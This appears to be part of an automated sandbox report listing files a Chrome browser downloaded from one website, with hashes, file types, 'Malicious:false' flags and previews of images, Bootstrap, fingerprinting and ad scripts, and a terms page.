                                                          SSDEEP:12:C/xvc2NXpARAdUebxrZDRWHNulKz3t3gLlS9W81AJg057enKi+iulslyN0W1xY57:CJv2AdUeFJRWtuYzd3g5S2JgEyhuGnWK
                                                          MD5:006E32416DAA0A2F4B770CD79D2D1C9D
                                                          SHA1:DBEF41915DB0A8946BCC8FC019443F773495BCE9
                                                          SHA-256:26A47479260CCEB61F81F013E872497C659B5D919A57F36D9E8692B3379CF08E
                                                          SHA-512:80E5789BB16A32265B2485F2CF6C49DF827506D4EEE26833A77BF09C7B1FED23C2799EF3C03C1E6EC1858EDD1B80048E43E28FE6658FE3042E218ABEC3595513
                                                          Malicious:false
                                                          Reputation:low
                                                          URL:https://sofa.thriveuniversehq.com/utils/banners/banner-bf.js?v=1.04
                                                          Preview:var css = 'img.banner { \...position: fixed; \...top: 0; \...width: 150px;\...z-index: 999999999999;\..}\..\n\..@media all and (max-width: 500px) {\...img.banner {\....width: 100px;\...}\..}\..',..head = document.head || document.getElementsByTagName('head')[0],..style = document.createElement('style');....style.type = 'text/css';..if (style.styleSheet){.. // This is required for IE8 and below... style.styleSheet.cssText = css;..} else {.. style.appendChild(document.createTextNode(css));..}..head.appendChild(style);....var img = document.createElement('img');..img.src = "/utils/banners/images/2023-months/2023-11.png?v=1";..img.className = 'banner';..img.onclick = function () { this.style.display = 'none'; }..document.body.appendChild(img);
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:PNG image data, 300 x 300, 8-bit/color RGBA, non-interlaced
                                                          Category:dropped
                                                          Size (bytes):36030
                                                          Entropy (8bit):7.978346560181183
                                                          Encrypted:false
                                                          SSDEEP:768:X7KjW6udNmJBlGpUaUkroF1XPAwjndfL/a0Vwp7XtY:XR6udNmJBcUa9oF1/ASLaphY
                                                          MD5:4BFBE9233B14CD02086784EF89626DD8
                                                          SHA1:08C63AE98AA480B86FDE64A6536E824748A5B8E3
                                                          SHA-256:D7FD50F440F4F0377D9B4B7CA539BABC1D776259B55B6D295E498247A2265C34
                                                          SHA-512:9C1DEA2813EAA8E5586CA6A70CDA53BADD2C982AFE91BB648579F5BAECB149DAB852C74431C031AA08CFCE64A6A9297075F34A44DC7A817C00942701001E2689
                                                          Malicious:false
                                                          Reputation:low
                                                          Preview:.PNG........IHDR...,...,.....y}.u....sRGB...,.....pHYs................cIDATx...........8..c.D.8DD.........e.z..."..(...q..8.y...5...1..(....q.......[{.]..T.....Z.SO7M..:..Zk.w....Z..."..d.9..c....p........ZO.=..g.h....^[w]..^.....c..n}....k..\...6.........}..'..#.R.L..XD...`......z}b.....5....\..u..Gt..[E..Y?9...q.....V.U.?../.Rt.Z=NZt.+.<PY....YL.mi.R....=..........2....+s}.v.../.~..?.....mk..9_.......k[].E......E..c....=..'.C.j.<..XH......R.A......P{....6.kPtC.........Ue.y.....2......z...D4c......\_..\[......c.........h....#.V...'fq...,....f....n.~dt...mC.D.....:h...m..p.^..$.2..km.+{..F.V.A.8q-......;..9...a...q.7....^.*.]..A.. ..K...F.Oj..A.J...R.<./.....6;.0....w....gt...m.]........_..n...]\f..y......-..........&#...0B....[..;.E.7_~.=v...];..n.:&.a....\W...o.H_.E......Q.......t4.....6.O|..f.$c.u....;.....gt.nS.'..}...G......>.t...F..{ht...hd.d\.....JII.fAk.......+s=.K.P.....v...q.]Q....'..k.........{Mm..H].E.r...K-wL.X-R..
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 50x50, components 3
                                                          Category:downloaded
                                                          Size (bytes):1005
                                                          Entropy (8bit):7.267653088789914
                                                          Encrypted:false
                                                          SSDEEP:24:shtyS71YXcz8ZNXqIa0S6vp1o1jmL6OlI:shw/ZNaIa0SZ0mOW
                                                          MD5:C954BA990F4D77FE70114200E3A1AA32
                                                          SHA1:D78628EA691AE21EE498A0182920A98BB8E64E51
                                                          SHA-256:E4475CABE931A1F71DEEA2DB0509054D4261AF226673C9450F0085B82D6D123F
                                                          SHA-512:6398C81C51142F41D02EDB198322F1C5163F9CD6DE3BEA2B993322E8CB860AB22842D4437C62BA94EFC3FF6FC012BF8448F78E735BD7E7F60C3FC4D51FC6B638
                                                          Malicious:false
                                                          Reputation:low
                                                          URL:https://sofa.thriveuniversehq.com/people/4.jpg
                                                          Preview:......Exif..II*.................Ducky..............Adobe.d...............................................#%'%#.//33//@@@@@@@@@@@@@@@......................&.....&0#....#0+.'''.+550055@@?@@@@@@@@@@@@......2.2..".................................................................................!1..AQa"2.q.R.3..Bb..4.....rS.DT.....................!1Qa..Aq2r."R#3.............?.a.e.X..[V....c..+.e...2..Y..o>_.CZK\..m.B.6.B...\........L.'M..........58..'..3>.n....5..lY894.A-.UFJ..;-0.w..X....EIx......Rl.k....0..gB....G..@N......3...{]@~.?......U....5.^.a%+K..>aA...@.r..l.......Z.j..)./k{..=...E.v.lL..o....;.2.E4&.-d.....aq#.u.Q`s...\..Y]V.k@...bU.b2.E#^.......y.R.._.|...i}:..5...cs.f.6.*...f#.w...1....tW.3...,j.;.q.i...S.......vO.c..xG.j...k.d......3.H....,u...A....$..E.....K..3B....?......P..XJ.V...r...h.V.%,...\..>I............I.A.!...a(.....Q..'.'.E1.1$p.......X.5...6...j.._C=.-./.._T........B.*._..........3/9W.7...c..~...B...w2...bK../..I.|......}k..\e..*.....K..
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 1200x675, components 3
                                                          Category:dropped
                                                          Size (bytes):160789
                                                          Entropy (8bit):7.975676812086097
                                                          Encrypted:false
                                                          SSDEEP:3072:UU0CiSdOVf9xJHpcjIHB8d7x9t8K3BPh6zoNIwK2ljx6ahZTM3O:xiSyWsh8dWK3BJ6w+2ljpM3O
                                                          MD5:6F200C08E5731E5F24F948ABD20346D6
                                                          SHA1:12B2E49C4B836F2EDF258E21D1BBDE1AA1F02DA9
                                                          SHA-256:3EF0935175018E558CCB82F27C3172D9B550F9C39188FB134207CDBC9C30F73A
                                                          SHA-512:8856E39CB73A5A68D0D2340E39E65D25D55DD5427E5725860D71BDD3755B953BB6FB1A849D30C7687AC4F86B9203DD5E615BDF7C66E6D72531C3D2AB2924B12B
                                                          Malicious:false
                                                          Reputation:low
                                                          Preview:......Exif..II*.................Ducky.......F.....,http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 6.0-c002 79.164488, 2020/07/10-22:06:53 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop 2021 Macintosh" xmpMM:InstanceID="xmp.iid:AA13D9CF5BEF11EBB172EE5B52C878BA" xmpMM:DocumentID="xmp.did:AA13D9D05BEF11EBB172EE5B52C878BA"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:AA13D9CD5BEF11EBB172EE5B52C878BA" stRef:documentID="xmp.did:AA13D9CE5BEF11EBB172EE5B52C878BA"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d................................................................................................................................
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:JSON data
                                                          Category:downloaded
                                                          Size (bytes):42
                                                          Entropy (8bit):4.403989446485262
                                                          Encrypted:false
                                                          SSDEEP:3:agHln1AXB/FwOSCUHoAn:agHox/FwFIAn
                                                          MD5:E901EF36FE4322981D42AD6BA305EC1B
                                                          SHA1:66A8A5FBC507B0D257ED969C0D880C226FBEE7D0
                                                          SHA-256:7E89417A4D783306A36D217F13DDDFF662F2CC5DA57A995877961E85446A96F1
                                                          SHA-512:0B1C0B9E94A34D8242BAF9A6ABBB9D9333641452AEE5B85BD4FEF582F2AB31C08976EF86E82960146D835CC0828F9B9462E77405083199AFACF20DFF5D7ACEDD
                                                          Malicious:false
                                                          Reputation:low
                                                          URL:https://sofa.thriveuniversehq.com/manifest.json
                                                          Preview:{ .. "gcm_sender_id": "325377692881"..}
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text, with very long lines (65371)
                                                          Category:downloaded
                                                          Size (bytes):121260
                                                          Entropy (8bit):5.0979844613521985
                                                          Encrypted:false
                                                          SSDEEP:768:ly3Gxw/jc/QWlJxtQ8IuiHlqLmzI4X8OAduFKbv2ctg2Bd8JP7ecQVvH1FS:Xw/o1BIuiHlqLmN8lDbNmPbh
                                                          MD5:2F624089C65F12185E79925BC5A7FC42
                                                          SHA1:8EB176C70B9CFA6871B76D6DC98FB526E7E9B3DE
                                                          SHA-256:EECE6E0C65B7007AB0EB1B4998D36DAFE381449525824349128EFC3F86F4C91C
                                                          SHA-512:9CDA3EC821C4CA7D2C98CC52B309DFFCE9D7EBF2B026E65394D6418DAB8A8532B473ECD3FAAE49382C7450585743AAC947D8E0E84B3C80FB83DAE65C6032EA4B
                                                          Malicious:false
                                                          Reputation:low
                                                          URL:https://sofa.thriveuniversehq.com/assets/bootstrap/dist/css/bootstrap.min.css
                                                          Preview:/*!. * Bootstrap v3.3.6 (http://getbootstrap.com). * Copyright 2011-2015 Twitter, Inc.. * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE). *//*! normalize.css v3.0.3 | MIT License | github.com/necolas/normalize.css */html{font-family:sans-serif;-webkit-text-size-adjust:100%;-ms-text-size-adjust:100%}body{margin:0}article,aside,details,figcaption,figure,footer,header,hgroup,main,menu,nav,section,summary{display:block}audio,canvas,progress,video{display:inline-block;vertical-align:baseline}audio:not([controls]){display:none;height:0}[hidden],template{display:none}a{background-color:transparent}a:active,a:hover{outline:0}abbr[title]{border-bottom:1px dotted}b,strong{font-weight:700}dfn{font-style:italic}h1{margin:.67em 0;font-size:2em}mark{color:#000;background:#ff0}small{font-size:80%}sub,sup{position:relative;font-size:75%;line-height:0;vertical-align:baseline}sup{top:-.5em}sub{bottom:-.25em}img{border:0}svg:not(:root){overflow:hidden}figure{margin:1em 40px}hr
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                          Category:dropped
                                                          Size (bytes):850
                                                          Entropy (8bit):7.680885612757513
                                                          Encrypted:false
                                                          SSDEEP:24:+l1KvB8VpaJI+e8HC2+6kIfDy1WjVf4MrQ1:+p0JI+e2C2tFpjVf4M+
                                                          MD5:352549ECE32E8183CB6792D5B1E7450B
                                                          SHA1:6C6EA952EC11C2026E828F0118BB9A58E35CCFBF
                                                          SHA-256:24283ABECAB24B0A7F50518EF5E9C684B1ABD4FDBB31C6D0E1CA63A236A34D1C
                                                          SHA-512:5CC8C80095B2928EEAEAA987FEE7769FC344A913F89D4505F38687D87916351DABEA19883550FFE4B95B2E2802FEE7297A9927C845F78DD5AA963BFF06AE7EED
                                                          Malicious:false
                                                          Reputation:low
                                                          Preview:.PNG........IHDR... ... .....szz.....IDATX...k.P..7......(..PDq.H.u.;/tu0a.Uq.1.u(6MZm..../.L.K....W..D.e....-].6m.&=.....I..;....<OrNz.a'}...vO........PmY..Q..@.@O.%"..8..x.=.,^D.FWy .'.B]..-D.W.ct.@%0{..M..c..z*..te0@-.H.1..._.+..aa%!\I.iG..x.[....yP..|....,....T.N'@5y7/...%..q...W;..X8f|.e..M.W.T..T].G.$...?&.a~..n.U.80..o......#U....%QH.y..'....1..D..@!r.J.>..>..:._`$..&..S.....T.(.&@n...C[..<.....X.;...@.Z.B..lvE9..p.......C..w.yu.7.....*.1...M.d....88.0.ot$....P..h$......fCHZ&:..,.L..>...sE..:,.......'C.y..Gl...}......k......2..3.l..-.0f..^6.l....Q..1...G....2.7#...A.yR.'..c..G.g...R.n...$..N.C.u..|....,..iH.,.&.<.:Z.AO.n()H.R..p&'.. ...._.z....ah=..c|Z.)..e...LNu...4Y...qp..{...:.V...B..p..zh....k.....Y......B..h|....o^...~4...z...w....4]...q...=.......}RO..N}.?P.k.....LC&....0....IEND.B`.
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:downloaded
                                                          Size (bytes):16
                                                          Entropy (8bit):3.875
                                                          Encrypted:false
                                                          SSDEEP:3:HBIvYn:evY
                                                          MD5:0E920111498FD92C3FBD7F00C428D762
                                                          SHA1:5082EB504DD47582063312CDBE3AB7187FBF3960
                                                          SHA-256:3E45F5E239FF94FE839057AF3EFC8AE568C5C32DBF2D3D0CF1C347E26DFC10AF
                                                          SHA-512:61FF4D176BDAD99FD25255DA2ED84532035592D8BEA79EACB3F76A7C039C3AEC9D5FFB593C5F584E1E54A2FD9A7CD885DFE721A829CF8CFC113C0FB5935AC357
                                                          Malicious:false
                                                          Reputation:low
                                                          URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISEAl1gq70TQQZwRIFDf-qZLM=?alt=proto
                                                          Preview:CgkKBw3/qmSzGgA=
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text, with very long lines (32024)
                                                          Category:downloaded
                                                          Size (bytes):34573
                                                          Entropy (8bit):5.5451808678577414
                                                          Encrypted:false
                                                          SSDEEP:384:Pr3jlN4bsIORv1QpjXuBsbqxkau1xvCt+CUgqottAWX+z1jW4/AtGJWq9qjr4YU:/TSnOTQpzgxyPI/ttALRH/Agd99
                                                          MD5:91FF20592A1B1AEBFC39C073360EF584
                                                          SHA1:70208111CC5E63E92A1EE1CC2D640A07DDF758E4
                                                          SHA-256:13774735C1ED030C52D47A268B2A2D1BC16BE14CC433C61FCFC6EE1F81A4E96E
                                                          SHA-512:08013DBB3BB97EE37D0167AEBB4BDE4CE7C4700156FBD479A1E03252FBE2B601F92C0A18B7728D9EFE498D0E9E59F64A481B31E3B815233A42A81B02FB2CD520
                                                          Malicious:false
                                                          Reputation:low
                                                          URL:https://sofa.thriveuniversehq.com/js/fingerprintjs2/1.5.0/fingerprint2.min.js
                                                          Preview:!function(e,t,i){"use strict";"function"==typeof define&&define.amd?define(i):"undefined"!=typeof module&&module.exports?module.exports=i():t.exports?t.exports=i():t[e]=i()}("Fingerprint2",this,function(){"use strict";Array.prototype.indexOf||(Array.prototype.indexOf=function(e,t){var i;if(null==this)throw new TypeError("'this' is null or undefined");var a=Object(this),r=a.length>>>0;if(0===r)return-1;var n=+t||0;if(Math.abs(n)===1/0&&(n=0),n>=r)return-1;for(i=Math.max(n>=0?n:r-Math.abs(n),0);i<r;){if(i in a&&a[i]===e)return i;i++}return-1});var e=function(t){if(!(this instanceof e))return new e(t);var i={swfContainerId:"fingerprintjs2",swfPath:"flash/compiled/FontList.swf",detectScreenOrientation:!0,sortPluginsFor:[/palemoon/i],userDefinedFonts:[]};this.options=this.extend(t,i),this.nativeForEach=Array.prototype.forEach,this.nativeMap=Array.prototype.map};return e.prototype={extend:function(e,t){if(null==e)return t;for(var i in e)null!=e[i]&&t[i]!==e[i]&&(t[i]=e[i]);return t},log:func
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:PNG image data, 3840 x 2160, 4-bit colormap, non-interlaced
                                                          Category:dropped
                                                          Size (bytes):44159
                                                          Entropy (8bit):7.810382073437664
                                                          Encrypted:false
                                                          SSDEEP:768:my5+/dw8sXeH2aRWRN2GuhD857F2miygJEj821Fu8B/YhSqF1bTGRG1U6:XMPKeH2EWLVuyshqj82W8JYh/ZaRG1P
                                                          MD5:4DDE29BF574584AC41B0B0D6A0A9AF4D
                                                          SHA1:E51DE0119C7CB1FDDE602FEAF121084F9FD38DE5
                                                          SHA-256:3C64D09C63D75D83689EA977B8FFF3EB371618F911EA58690866D83622EE5FAD
                                                          SHA-512:1BC29C89653A7724B5B48C5BBDEB82EF64567E67C6D5E2B6B683BD65D5CF7BBF1E55EB93A15B3B45FF28873AF6E07D328B52453CD7FE197CF4AF0BC55919BE4C
                                                          Malicious:false
                                                          Reputation:low
                                                          Preview:.PNG........IHDR.......p.....b..A....PLTEGpL..$..$..#..$..$..$9.&i....tRNS..#.M{3Kr... .IDATx..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ..FPUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:Unicode text, UTF-8 text, with very long lines (31374), with no line terminators
                                                          Category:downloaded
                                                          Size (bytes):31381
                                                          Entropy (8bit):5.484918828143973
                                                          Encrypted:false
                                                          SSDEEP:768:Zd3LLF5yiEcv+qmDw6EPqBtwGk66G4rtP:Ztko+qmDw6ECBtwr66G4hP
                                                          MD5:364062460E5DCE61E8FF671B9EE098F5
                                                          SHA1:89F1FDE3F04B8B5519E7CDA1DFE3C82311E7F840
                                                          SHA-256:0D5556B35379D3E3BC8430BDC9EFCC46629DEB83A2EFDCE15AE4185EB0B62039
                                                          SHA-512:DC66D50A08E7EF8F96C16080517B2B15E2A8CE237CD809E2E1CE82F0AF67286F67A934222AEE768ACE68BF4726AA299CEB81F06E5BAF652818F2753B6E1AF08D
                                                          Malicious:false
                                                          Reputation:low
                                                          URL:https://sofa.thriveuniversehq.com/assets/js/ads.js
                                                          Preview:var ADS=function(e){"use strict";var t=function(){return t=Object.assign||function(e){for(var t,n=1,r=arguments.length;n<r;n++)for(var a in t=arguments[n])Object.prototype.hasOwnProperty.call(t,a)&&(e[a]=t[a]);return e},t.apply(this,arguments)};function n(e,t,n,r){return new(n||(n=Promise))((function(a,o){function i(e){try{u(r.next(e))}catch(t){o(t)}}function c(e){try{u(r.throw(e))}catch(t){o(t)}}function u(e){var t;e.done?a(e.value):(t=e.value,t instanceof n?t:new n((function(e){e(t)}))).then(i,c)}u((r=r.apply(e,t||[])).next())}))}function r(e,t){var n,r,a,o,i={label:0,sent:function(){if(1&a[0])throw a[1];return a[1]},trys:[],ops:[]};return o={next:c(0),throw:c(1),return:c(2)},"function"==typeof Symbol&&(o[Symbol.iterator]=function(){return this}),o;function c(o){return function(c){return function(o){if(n)throw new TypeError("Generator is already executing.");for(;i;)try{if(n=1,r&&(a=2&o[0]?r.return:o[0]?r.throw||((a=r.return)&&a.call(r),0):r.next)&&!(a=a.call(r,o[1])).done)return a;s
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:HTML document, ASCII text
                                                          Category:downloaded
                                                          Size (bytes):28270
                                                          Entropy (8bit):4.947675842967846
                                                          Encrypted:false
                                                          SSDEEP:768:GJCiF22UVswdu1VpL5fp/KSP9XuzE/lJOAWidzl26nu:W02KaOSFXvlX8f
                                                          MD5:1E4398D0C81E409A4933482D271FFF7C
                                                          SHA1:3AD82AF5EB0D478681D4FB254E22FCAFEFAFF741
                                                          SHA-256:7931D9006F71954B6067D8DAF8C968235D3ECFF0DD433136955A54EA5F0DDFE3
                                                          SHA-512:5DC3BDDFFDD9044C4D2055B98ABAC6E3AEC2C84BE4D9BE9A5DB2E55D96DD28C2CA9E864ECB25408DF360077DDFE2250C028850F642B060E4AA039C54307EA436
                                                          Malicious:false
                                                          Reputation:low
                                                          URL:https://sofa.thriveuniversehq.com/s3/terms/terms.php
                                                          Preview:<html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252">.<meta name="robots" content="noindex,nofollow,noarchive">.</head>.<body>.<p dir="ltr">..sofa.thriveuniversehq.com</p>.<p dir="ltr">..Terms and Conditions of Use and other Disclosures.</p>.<p dir="ltr">..&#8232;&#8232;1. Introduction&#8232;. Thank you for using sofa.thriveuniversehq.com..</p>.<p dir="ltr">..By using this site, you agree to be legally bound to this document which consists of our Terms of and Conditions of Use and other Disclosures, and..constitutes a legally-binding agreement ("Agreement") governing the terms of providing you with our service. Throughout this document, the words "us,".."we," "our," and "Company" refer to sofa.thriveuniversehq.com, as is appropriate in the context of the use of the words. Likewise, the words "you" and "your"..refer to you, the person who is being presented with this document for your agreement..</p>.<p dir="ltr">..Accessing the Site, in any manner, whet
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:MS Windows icon resource - 3 icons, 16x16, 32 bits/pixel, 32x32, 32 bits/pixel
                                                          Category:dropped
                                                          Size (bytes):22382
                                                          Entropy (8bit):1.7993121781592736
                                                          Encrypted:false
                                                          SSDEEP:48:sSY37LOM5M80I15CEARV/acnFNOpaF/vXE:sSw7LOekI1EE+fPOpaF30
                                                          MD5:891E510219786F543CA998282ED99F45
                                                          SHA1:19FE2FF6A2418BCB44B02308B998CEF84199EE08
                                                          SHA-256:E4BDF72E2F803F7E19907C12F407AC7F7CD5F1F94BFD730B9BE24B0D49191B48
                                                          SHA-512:E6729E7E1ED1909297317E249ADB7AF6C230B2A7082EA792C7776FA5037C8ED8AAF02BCC4015334B6C439732F965CE19291FFE863126D0C20BED9A0C89C4A95B
                                                          Malicious:false
                                                          Reputation:low
                                                          Preview:............ .h...6... .... .........@@.... .(B..F...(....... ..... ................................................................................................................................................................................X.......J......."...........................................V..............................................................................................X......................................................................................................................................................................................................................................................................................................................]...........................U.......................................4...........................v...........2...t.........................................................H...9...................................................................c..............................
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                          Category:downloaded
                                                          Size (bytes):850
                                                          Entropy (8bit):7.680885612757513
                                                          Encrypted:false
                                                          SSDEEP:24:+l1KvB8VpaJI+e8HC2+6kIfDy1WjVf4MrQ1:+p0JI+e2C2tFpjVf4M+
                                                          MD5:352549ECE32E8183CB6792D5B1E7450B
                                                          SHA1:6C6EA952EC11C2026E828F0118BB9A58E35CCFBF
                                                          SHA-256:24283ABECAB24B0A7F50518EF5E9C684B1ABD4FDBB31C6D0E1CA63A236A34D1C
                                                          SHA-512:5CC8C80095B2928EEAEAA987FEE7769FC344A913F89D4505F38687D87916351DABEA19883550FFE4B95B2E2802FEE7297A9927C845F78DD5AA963BFF06AE7EED
                                                          Malicious:false
                                                          Reputation:low
                                                          URL:https://www.google.com/images/icons/product/cloud_storage-32.png
                                                          Preview:.PNG........IHDR... ... .....szz.....IDATX...k.P..7......(..PDq.H.u.;/tu0a.Uq.1.u(6MZm..../.L.K....W..D.e....-].6m.&=.....I..;....<OrNz.a'}...vO........PmY..Q..@.@O.%"..8..x.=.,^D.FWy .'.B]..-D.W.ct.@%0{..M..c..z*..te0@-.H.1..._.+..aa%!\I.iG..x.[....yP..|....,....T.N'@5y7/...%..q...W;..X8f|.e..M.W.T..T].G.$...?&.a~..n.U.80..o......#U....%QH.y..'....1..D..@!r.J.>..>..:._`$..&..S.....T.(.&@n...C[..<.....X.;...@.Z.B..lvE9..p.......C..w.yu.7.....*.1...M.d....88.0.ot$....P..h$......fCHZ&:..,.L..>...sE..:,.......'C.y..Gl...}......k......2..3.l..-.0f..^6.l....Q..1...G....2.7#...A.yR.'..c..G.g...R.n...$..N.C.u..|....,..iH.,.&.<.:Z.AO.n()H.R..p&'.. ...._.z....ah=..c|Z.)..e...LNu...4Y...qp..{...:.V...B..p..zh....k.....Y......B..h|....o^...~4...z...w....4]...q...=.......}RO..N}.?P.k.....LC&....0....IEND.B`.
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text, with very long lines (32031)
                                                          Category:downloaded
                                                          Size (bytes):37544
                                                          Entropy (8bit):5.7831965742373095
                                                          Encrypted:false
                                                          SSDEEP:768:ozHO0UVJw156fPBzg4LWZtF3229m9GxVvw7I15b62NEai4JXH8Xzuhvi4yAoTdbs:ozHO0UVW76fpM4LWZtF3229ma4k22NEA
                                                          MD5:D56A1947AE3583E101D46A86CD20560F
                                                          SHA1:8E7EA02D82BBD0F03D91C6194666B557CC019F16
                                                          SHA-256:CDFA9A147AE8D8357855515BAB5291B8C9342EEED9D638B47103C19D9D9AAF36
                                                          SHA-512:CACF202E369ACBD5B063BEFC74CFE7E37AC3A1F9FC285867E77C543FCF53A19C05586A8CED8A33C4192F872E7DD26C7E6D9B2C21CF24DB1D1E9C9AD1EFF0CB82
                                                          Malicious:false
                                                          Reputation:low
                                                          URL:https://sofa.thriveuniversehq.com/assets/js/mobile-detect.js-master/mobile-detect.min.js
                                                          Preview:/*!@license Copyright 2013, Heinrich Goebl, License: MIT, see https://github.com/hgoebl/mobile-detect.js*/.!function(a,b){a(function(){"use strict";function a(a,b){return null!=a&&null!=b&&a.toLowerCase()===b.toLowerCase()}function c(a,b){var c,d,e=a.length;if(!e||!b)return!1;for(c=b.toLowerCase(),d=0;d<e;++d)if(c===a[d].toLowerCase())return!0;return!1}function d(a){for(var b in a)h.call(a,b)&&(a[b]=new RegExp(a[b],"i"))}function e(a,b){this.ua=a||"",this._cache={},this.maxPhoneWidth=b||600}var f={};f.mobileDetectRules={phones:{iPhone:"\\biPhone\\b|\\biPod\\b",BlackBerry:"BlackBerry|\\bBB10\\b|rim[0-9]+",HTC:"HTC|HTC.*(Sensation|Evo|Vision|Explorer|6800|8100|8900|A7272|S510e|C110e|Legend|Desire|T8282)|APX515CKT|Qtek9090|APA9292KT|HD_mini|Sensation.*Z710e|PG86100|Z715e|Desire.*(A8181|HD)|ADR6200|ADR6400L|ADR6425|001HT|Inspire 4G|Android.*\\bEVO\\b|T-Mobile G1|Z520m",Nexus:"Nexus One|Nexus S|Galaxy.*Nexus|Android.*Nexus.*Mobile|Nexus 4|Nexus 5|Nexus 6",Dell:"Dell.*Streak|Dell.*Aero|Dell.
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text, with very long lines (32003)
                                                          Category:downloaded
                                                          Size (bytes):36868
                                                          Entropy (8bit):5.176279342143451
                                                          Encrypted:false
                                                          SSDEEP:768:4UfYD27UwlNHMl9lqNuCPNjhqg8epm5CCJFXflA8Gf3ZTbQ:z/76whqKGvlm3ZXQ
                                                          MD5:C5B5B2FA19BD66FF23211D9F844E0131
                                                          SHA1:791AA054A026BDDC0DE92BAD6CF7A1C6E73713D5
                                                          SHA-256:2979F9A6E32FC42C3E7406339EE9FE76B31D1B52059776A02B4A7FA6A4FD280A
                                                          SHA-512:D9EF2AAB411371F5912381C9073422037528C8593AB5B3721BEA926880592F25BD5DFDEC5991CDFE5C5EF5F4E1D54E390E93DFD3BCA3F782AC5071D67B8624D4
                                                          Malicious:false
                                                          Reputation:low
                                                          URL:https://sofa.thriveuniversehq.com/assets/bootstrap/dist/js/bootstrap.min.js
                                                          Preview:/*!. * Bootstrap v3.3.6 (http://getbootstrap.com). * Copyright 2011-2015 Twitter, Inc.. * Licensed under the MIT license. */.if("undefined"==typeof jQuery)throw new Error("Bootstrap's JavaScript requires jQuery");+function(a){"use strict";var b=a.fn.jquery.split(" ")[0].split(".");if(b[0]<2&&b[1]<9||1==b[0]&&9==b[1]&&b[2]<1||b[0]>2)throw new Error("Bootstrap's JavaScript requires jQuery version 1.9.1 or higher, but lower than version 3")}(jQuery),+function(a){"use strict";function b(){var a=document.createElement("bootstrap"),b={WebkitTransition:"webkitTransitionEnd",MozTransition:"transitionend",OTransition:"oTransitionEnd otransitionend",transition:"transitionend"};for(var c in b)if(void 0!==a.style[c])return{end:b[c]};return!1}a.fn.emulateTransitionEnd=function(b){var c=!1,d=this;a(this).one("bsTransitionEnd",function(){c=!0});var e=function(){c||a(d).trigger(a.support.transition.end)};return setTimeout(e,b),this},a(function(){a.support.transition=b(),a.support.transition&&(a.event.
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 50x50, components 3
                                                          Category:dropped
                                                          Size (bytes):936
                                                          Entropy (8bit):7.243288128343521
                                                          Encrypted:false
                                                          SSDEEP:24:shtyDkHqfxlftjvapBTVzR3KMSDfiAvKhK8:shz6vapBTSDfjvn8
                                                          MD5:3FD556959987D7B090E8AE4C7C8E07F5
                                                          SHA1:EFAB3432C13DB50F9001E8A2C9FED57292B7710A
                                                          SHA-256:D7532D53E07DE8CD28C1A4D98E284DF714255EC21C86D6756FE9261EC30691CF
                                                          SHA-512:241D2BFEFF38BAAD17BA96124AF453E0D3BA0B402F7C567C589D227F71A30863FC2B4BB5A2F3A4871FC589E95870D2308F0A8926D09ECA9E1FAD0BCB1928FAE7
                                                          Malicious:false
                                                          Reputation:low
